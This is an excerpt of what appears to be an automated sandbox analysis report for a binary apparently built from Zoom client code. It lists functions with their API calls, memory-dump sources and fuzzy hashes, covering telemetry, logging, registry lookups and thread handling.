                  • Part of subcall function 00C7F5B0: __EH_prolog3.LIBCMT ref: 00C7F5B7
                  • Part of subcall function 00C7F5B0: ??0?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@V12@V12@I@Archive@Cmm@@QAE@PBDH0000@Z.RWSNDPQSKZ(?,?,?,?,?,?,00000004,00C68CC9,com.Zoom.app.meeting.update.disclaimer.status,0000275C,MyScreenName,MeetingNumber,MeetingID,Type,Agree,00000004), ref: 00C7F5D3
                  • Part of subcall function 00C86D43: __EH_prolog3_GS.LIBCMT ref: 00C86D4A
                  • Part of subcall function 00C86D43: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C68CF0), ref: 00C86D5E
                  • Part of subcall function 00C86D43: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.meeting.update.disclaimer.status,00000044,00C68CF0), ref: 00C86D90
                  • Part of subcall function 00C86D43: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(-00000004,-00000004,com.Zoom.app.meeting.update.disclaimer.status), ref: 00C86DCD
                  • Part of subcall function 00C86D43: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.meeting.update.disclaimer.status,-00000004,-00000004,com.Zoom.app.meeting.update.disclaimer.status), ref: 00C86DFF
                  • Part of subcall function 00C86D43: EnterCriticalSection.KERNEL32(?), ref: 00C86E91
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@StringV12@$Archive$H_prolog3MessagePackageTree@$CriticalEnterH00000@H0000@H_prolog3_Node@23@Root@SectionTemplate_4@Template_5@Tree
                • String ID: Agree$MeetingID$MeetingNumber$MyScreenName$Type$com.Zoom.app.meeting.update.disclaimer.status
                • API String ID: 1110529071-1599957615
                • Opcode ID: b4173191d450ec064720b69f51f866334bb131d73e086ec0ce1521665781a42b
                • Instruction ID: 4e9ac54f6e4e5a952e119845c13bd151734f9fbed01692934f954e3d2f7c1ef4
                • Opcode Fuzzy Hash: b4173191d450ec064720b69f51f866334bb131d73e086ec0ce1521665781a42b
                • Instruction Fuzzy Hash: ACE06571A44B50EED710BB556C4AB1D76605B00B29F40452AB2046E2D6DBF40548CBB5
                Function 00CB6CBB Relevance: 13.8, APIs: 9, Instructions: 339COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CB6CC5
                • ?UIntToString@Cmm@@YAXIAAV?$CStringT@_W@1@@Z.RWSNDPQSKZ(00000000,00D33368,?,0000036C,00CB5844,?,?,?,?,?,?,?,?,?,00000000,00000008), ref: 00CB6D1E
                  • Part of subcall function 00C644A0: __cftof.LIBCMT ref: 00C644CC
                  • Part of subcall function 00C644A0: ?Assign@?$CStringT@_W@Cmm@@QAEXPB_W@Z.RWSNDPQSKZ(?), ref: 00C644DA
                • ??H?$CStringT@_W@Cmm@@QBE?AV01@PB_W@Z.RWSNDPQSKZ(?,00D3D264,?,0000036C,00CB5844,?,?,?,?,?,?,?,?,?,00000000,00000008), ref: 00CB6D34
                  • Part of subcall function 00C54320: __EH_prolog3_GS.LIBCMT ref: 00C54327
                  • Part of subcall function 00C54320: ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,00000024), ref: 00C54339
                  • Part of subcall function 00C54320: ??Y?$CStringT@_W@Cmm@@QAEAAV01@PB_W@Z.RWSNDPQSKZ(?,?,00000024), ref: 00C54345
                  • Part of subcall function 00C54320: ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(00000000,?,00000024), ref: 00C5434D
                • ??H?$CStringT@_W@Cmm@@QBE?AV01@ABV01@@Z.RWSNDPQSKZ(?,00000008,?,0000036C,00CB5844,?,?,?,?,?,?,?,?,?,00000000,00000008), ref: 00CB6D44
                  • Part of subcall function 00C542C0: __EH_prolog3_GS.LIBCMT ref: 00C542C7
                  • Part of subcall function 00C542C0: ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,00000024), ref: 00C542D9
                  • Part of subcall function 00C542C0: ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(00000000,00000000,?,00000024), ref: 00C542F3
                • ?SetBasicMetricsInfo@CCmmPerfTelemetry@@CAXAAUZClientPerfMetricsInfo_s@ZoomPTPAAP@@_K@Z.RWSNDPQSKZ(?,?,?,0000036C,00CB5844,?,?,?,?,?,?,?,?,?,00000000,00000008), ref: 00CB6E1E
                • __aulldiv.LIBCMT ref: 00CB6F7D
                • ?SetMetricsInfoAttribs@CCmmPerfTelemetry@@CAXAAUZClientPerfMetricsInfo_s@ZoomPTPAAP@@AAUPerfTelemetryStartEntry@1@@Z.RWSNDPQSKZ(00000000,?,?,?,?,?,?,?,00000000,?,?,00000000,00000008), ref: 00CB702A
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@String$PerfV01@@$??0?$Metrics$H_prolog3_V01@$ClientInfo_s@Telemetry@@Zoom$Assign@?$Attribs@BasicEntry@1@@InfoInfo@P@@_StartString@TelemetryW@1@@__aulldiv__cftof
                • String ID:
                • API String ID: 269656296-0
                • Opcode ID: 9901826590253b63ce5330451250b927b2e0c0305f8d2a679c0c0db217128adb
                • Instruction ID: 93eac50c174d019add668f92d88bf78309f7294c175b84c66d42bc70b806f975
                • Opcode Fuzzy Hash: 9901826590253b63ce5330451250b927b2e0c0305f8d2a679c0c0db217128adb
                • Instruction Fuzzy Hash: 8FE18F71904649EFCB29DF64C880BEDB7B9BF44305F1481AAE819A3251DB34AF85DF60
                Function 00CD4720 Relevance: 13.7, APIs: 9, Instructions: 201registrylibraryCOMMON
                Download Yara Rule
                APIs
                • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020019,?,?,?,?,00000118,?,?), ref: 00CD47B9
                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000C7,00000000,00000000,00000000,00000000), ref: 00CD47F6
                • RegOpenKeyExW.ADVAPI32(00000000,?,00000000,00020019,?), ref: 00CD4871
                • RegGetValueW.ADVAPI32(00000000,00000000,?,0000FFFF,?,?,00000F9E), ref: 00CD48D4
                • RegCloseKey.ADVAPI32(?), ref: 00CD48E2
                • PathIsRelativeW.SHLWAPI(?), ref: 00CD4926
                • LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 00CD4942
                • RegEnumKeyExW.ADVAPI32(?,00000001,?,?,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,00000118), ref: 00CD4986
                • RegCloseKey.ADVAPI32(?,?,?,?,00000118,?,?), ref: 00CD49A0
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: CloseEnumOpen$LibraryLoadPathRelativeValue
                • String ID:
                • API String ID: 1037566479-0
                • Opcode ID: acc1fef530641603be773d40fc8abe5f458024c1df34a7a87a74e10b3f542f30
                • Instruction ID: 1141e620d31a3884b44be2aa0d1132168bf913c42db9ab052a1f084ba0c45e52
                • Opcode Fuzzy Hash: acc1fef530641603be773d40fc8abe5f458024c1df34a7a87a74e10b3f542f30
                • Instruction Fuzzy Hash: 5B618F35A00218ABDB38DF51DD95FEBB37CEB09744F04419AEB1AAB280D770AF45CA50
                Function 00D08070 Relevance: 13.7, APIs: 9, Instructions: 200COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: _free
                • String ID:
                • API String ID: 269201875-0
                • Opcode ID: d88ab096bcecd4d79a8ada4a4c338ff46b36e16eadf99730cd776c2a70ed84bc
                • Instruction ID: 51606419796a002d4eef693e114b2d9281b8b8db3751103df4a4fdbb4d0a3bbf
                • Opcode Fuzzy Hash: d88ab096bcecd4d79a8ada4a4c338ff46b36e16eadf99730cd776c2a70ed84bc
                • Instruction Fuzzy Hash: 2B610471900345DFDB20DF74C841BAABBE9EF44310F14446AE999EB2C1EB709D40AB71
                Function 00CE036F Relevance: 13.6, APIs: 9, Instructions: 81synchronizationthreadCOMMON
                Download Yara Rule
                APIs
                • CreateThread.KERNEL32(00000000,00000000,00CE0460,?,00000000,00000000), ref: 00CE03B9
                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00CE03C8
                • CloseHandle.KERNEL32(00000000), ref: 00CE03CF
                • GetCurrentProcess.KERNEL32(00000001), ref: 00CE03D7
                • TerminateProcess.KERNEL32(00000000), ref: 00CE03DE
                • EnterCriticalSection.KERNEL32(00000098), ref: 00CE03EF
                • GetCurrentProcess.KERNEL32(00000001), ref: 00CE0437
                • TerminateProcess.KERNEL32(00000000), ref: 00CE043E
                • LeaveCriticalSection.KERNEL32(00000098), ref: 00CE0445
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Process$CriticalCurrentSectionTerminate$CloseCreateEnterHandleLeaveObjectSingleThreadWait
                • String ID:
                • API String ID: 2365892460-0
                • Opcode ID: f78797294cd312a1120efdf2c90e4fdecee590380f992622e5a758726a5caf9f
                • Instruction ID: 875209883ef9a5f7b93fb727d4883330cf192184fab7947c841cca53a214db9d
                • Opcode Fuzzy Hash: f78797294cd312a1120efdf2c90e4fdecee590380f992622e5a758726a5caf9f
                • Instruction Fuzzy Hash: B621B531540340BBD7215B659D89BBA37A9EB49721F10062AFA25CA290DBF48985C7B2
                Function 00CB8A10 Relevance: 13.6, APIs: 9, Instructions: 73timesynchronizationCOMMON
                Download Yara Rule
                APIs
                • ?Now@Time@Cmm@@SA?AV12@XZ.RWSNDPQSKZ(?), ref: 00CB8A23
                  • Part of subcall function 00CA1740: ?Now@TimeTicks@Cmm@@SA?AV12@XZ.RWSNDPQSKZ(?,?,?,?,?,?,00CAC2A6,?,?,?,?,?,?,?,?,?), ref: 00CA1761
                  • Part of subcall function 00CA1740: ?Now@TimeTicks@Cmm@@SA?AV12@XZ.RWSNDPQSKZ(?,?,?,?,?,?,00CAC2A6,?,?,?,?,?,?,?,?,?), ref: 00CA178E
                • WaitForSingleObject.KERNEL32(?,000493E0), ref: 00CB8A3E
                • ?DoConsumeEvents@CCmmPerfTelemetry@@SAXXZ.RWSNDPQSKZ ref: 00CB8A4F
                  • Part of subcall function 00CB7AC0: __EH_prolog3.LIBCMT ref: 00CB7AC7
                  • Part of subcall function 00CB7AC0: EnterCriticalSection.KERNEL32(00DFFB3C,00000024), ref: 00CB7AD2
                  • Part of subcall function 00CB7AC0: LeaveCriticalSection.KERNEL32(00DFFB3C), ref: 00CB7AE7
                • EnterCriticalSection.KERNEL32(?), ref: 00CB8A5B
                • LeaveCriticalSection.KERNEL32(?), ref: 00CB8A76
                • ?Now@Time@Cmm@@SA?AV12@XZ.RWSNDPQSKZ(?), ref: 00CB8A81
                • ?DoSendEvents@CCmmPerfTelemetry@@SAXXZ.RWSNDPQSKZ ref: 00CB8AB2
                • ?Now@Time@Cmm@@SA?AV12@XZ.RWSNDPQSKZ(?), ref: 00CB8ABC
                • ResetEvent.KERNEL32(?), ref: 00CB8AD5
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@Now@V12@$CriticalSection$Time@$EnterEvents@LeavePerfTelemetry@@Ticks@Time$ConsumeEventH_prolog3ObjectResetSendSingleWait
                • String ID:
                • API String ID: 924306438-0
                • Opcode ID: fdf2438b5b92ff1521ba969def3c184e31f34b5c8cb02d3d13921d3bae2bb001
                • Instruction ID: 4612c2056b9d3e9c172ca146a952c7fd0e28d0d7c21e1b93981605e01377bd50
                • Opcode Fuzzy Hash: fdf2438b5b92ff1521ba969def3c184e31f34b5c8cb02d3d13921d3bae2bb001
                • Instruction Fuzzy Hash: 1A21F2391087429F8710DFA4E884AEA7BE9EF85750F04492EE8A5D3251CF30D90AEA61
                Function 00CBE8AA Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 158timeCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CBE8B4
                • ?IntToString@Cmm@@YAXHAAV?$CStringT@_W@1@@Z.RWSNDPQSKZ(?,00D33368), ref: 00CBEAB0
                  • Part of subcall function 00CA16E7: ?Now@TimeTicks@Cmm@@SA?AV12@XZ.RWSNDPQSKZ(?,?,?,?,00CA1789,?,?,?,?,?,00CAC2A6,?), ref: 00CA16F0
                  • Part of subcall function 00CA16E7: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,00CA1789,?,?,?,?,?,00CAC2A6,?), ref: 00CA170A
                  • Part of subcall function 00CA16E7: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CA171A
                • ?LocalExplode@Time@Cmm@@QBEXPAUExploded@12@@Z.RWSNDPQSKZ(?,00D3D264,?,00D35050,00000000,00000148,00CBEE5D,?), ref: 00CBE938
                  • Part of subcall function 00C5E1B0: ?Explode@Time@Cmm@@ABEX_NPAUExploded@12@@Z.RWSNDPQSKZ(00000001,?), ref: 00C5E1BB
                  • Part of subcall function 00CAEA80: __EH_prolog3.LIBCMT ref: 00CAEA87
                  • Part of subcall function 00C5A0A6: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,?,00000000,?,00C64731), ref: 00C5A0BC
                  • Part of subcall function 00C52FC0: __EH_prolog3_catch.LIBCMT ref: 00C52FC7
                  • Part of subcall function 00C52FC0: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,00000028,00C64738), ref: 00C53042
                  • Part of subcall function 00C57B52: __EH_prolog3.LIBCMT ref: 00C57B59
                • ?AssignOther@?$CStringT@_W@Cmm@@QAEAAV12@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.RWSNDPQSKZ(?,?,?), ref: 00CBEA1A
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?), ref: 00CBEA2E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$StringTime$Explode@Exploded@12@@H_prolog3State@Time@Unlock@V12@$??0?$AssignD@2@@std@@@D@std@@FileH_prolog3_H_prolog3_catchLocalNow@Other@?$String@SystemTicks@U?$char_traits@Unothrow_t@std@@@V?$allocator@V?$basic_string@W@1@@__ehfuncinfo$??2@
                • String ID: .log$0
                • API String ID: 3539067199-692761683
                • Opcode ID: cc9fa4fc0effd4fc9d1c8252c5fef71827e2b7c0862ffa1dfa632164781a2ecb
                • Instruction ID: 997145105afaaf409d4c796b0a2b8aae1970baed8761dc87fc901f45e6f9adfd
                • Opcode Fuzzy Hash: cc9fa4fc0effd4fc9d1c8252c5fef71827e2b7c0862ffa1dfa632164781a2ecb
                • Instruction Fuzzy Hash: F0518C75D002189BCF14EFA4DC56BDDB7B9AF54301F00846AF90AA7282DF749A8CDB14
                Function 00CBE618 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 147fileCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CBE61F
                • CreateFileW.KERNEL32(.\debug.log,40000000,00000003,00000000,00000004,00000080,00000000,00000000), ref: 00CBE6DD
                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?,?,?,?,?,?,?,?,?,0000003C,00CADEA7), ref: 00CBE726
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: File$CreateH_prolog3_Pointer
                • String ID: .\debug.log
                • API String ID: 3541882424-3649441461
                • Opcode ID: 8ed63d6dd20695d1cd1f308f98ad3c4c5b5a7f26533fca33c6feed5eeb52a9ef
                • Instruction ID: 4e309e02c007cdb944fb27bf5312e833bee951ccb976cc616d43876f7f80bee5
                • Opcode Fuzzy Hash: 8ed63d6dd20695d1cd1f308f98ad3c4c5b5a7f26533fca33c6feed5eeb52a9ef
                • Instruction Fuzzy Hash: D1515F70900305EADF249F64C889BDA7BB5AF04B15F204159F914BF1D2DBB0DA85DB64
                Function 00CE69D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120COMMON
                Download Yara Rule
                APIs
                • _ValidateLocalCookies.LIBCMT ref: 00CE6A07
                • ___except_validate_context_record.LIBVCRUNTIME ref: 00CE6A0F
                • _ValidateLocalCookies.LIBCMT ref: 00CE6A98
                • __IsNonwritableInCurrentImage.LIBCMT ref: 00CE6AC3
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000001), ref: 00CE6ADC
                • _ValidateLocalCookies.LIBCMT ref: 00CE6B18
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: CookiesLocalValidate$Cmm@@CurrentImageNonwritableState@Unlock@___except_validate_context_record
                • String ID: csm
                • API String ID: 1484581595-1018135373
                • Opcode ID: 05c134126be301087bfe9a5e222e2675d1f9e07d541d08f9f7f769a211050f51
                • Instruction ID: 9ed5ee7a94af65213a21ababf0405e023d337c293a2e7eaf14b3f55354e12673
                • Opcode Fuzzy Hash: 05c134126be301087bfe9a5e222e2675d1f9e07d541d08f9f7f769a211050f51
                • Instruction Fuzzy Hash: 8D41D930E10288DFCF10DF6AC884A9EBBB5EF55354F14C065E825AB392D731EA55DBA0
                Function 00CBEBD6 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 94COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CBEBDD
                • ??0?$CStringT@_W@Cmm@@QAE@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.RWSNDPQSKZ(00000000,0000007C,00CBEDC1,00DFFA28,?,00DFFA28,00DFFA28,00DFFA28,00DFFA28,?,00CBEE52,00000000,00000000,?), ref: 00CBEBFF
                • ?IntToString@Cmm@@YAXHAAV?$CStringT@_W@1@@Z.RWSNDPQSKZ(?,00000000,last_log_file_id.txt,00D3D264,?,00D35050,00000000,0000007C,00CBEDC1,00DFFA28,?,00DFFA28), ref: 00CBEC5F
                  • Part of subcall function 00C64400: ?Assign@?$CStringT@_W@Cmm@@QAEXPB_W@Z.RWSNDPQSKZ(?), ref: 00C6443A
                • ?AssignOther@?$CStringT@D@Cmm@@QAEAAV12@ABV?$CStringT@_W@2@@Z.RWSNDPQSKZ(00000000), ref: 00CBEC88
                  • Part of subcall function 00C55C50: ?_cstring_set@Cmm@@YAXAAV?$CStringT@D@1@IPB_WI@Z.RWSNDPQSKZ(?,00000000,?,?), ref: 00C55C6B
                • ??0?$CStringT@D@Cmm@@QAE@PBD@Z.RWSNDPQSKZ(-00000004), ref: 00CBEC9C
                • cmm_fs_write.RWSNDPQSKZ(00DFFA28,?,?,00000001), ref: 00CBECF7
                  • Part of subcall function 00C63010: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00C63034
                  • Part of subcall function 00C63010: ?Write@CFile@Cmm@@QAEIPBXI@Z.RWSNDPQSKZ(?,?), ref: 00C6304F
                  • Part of subcall function 00C63010: ?Close@CFile@Cmm@@QAEXXZ.RWSNDPQSKZ ref: 00C63059
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
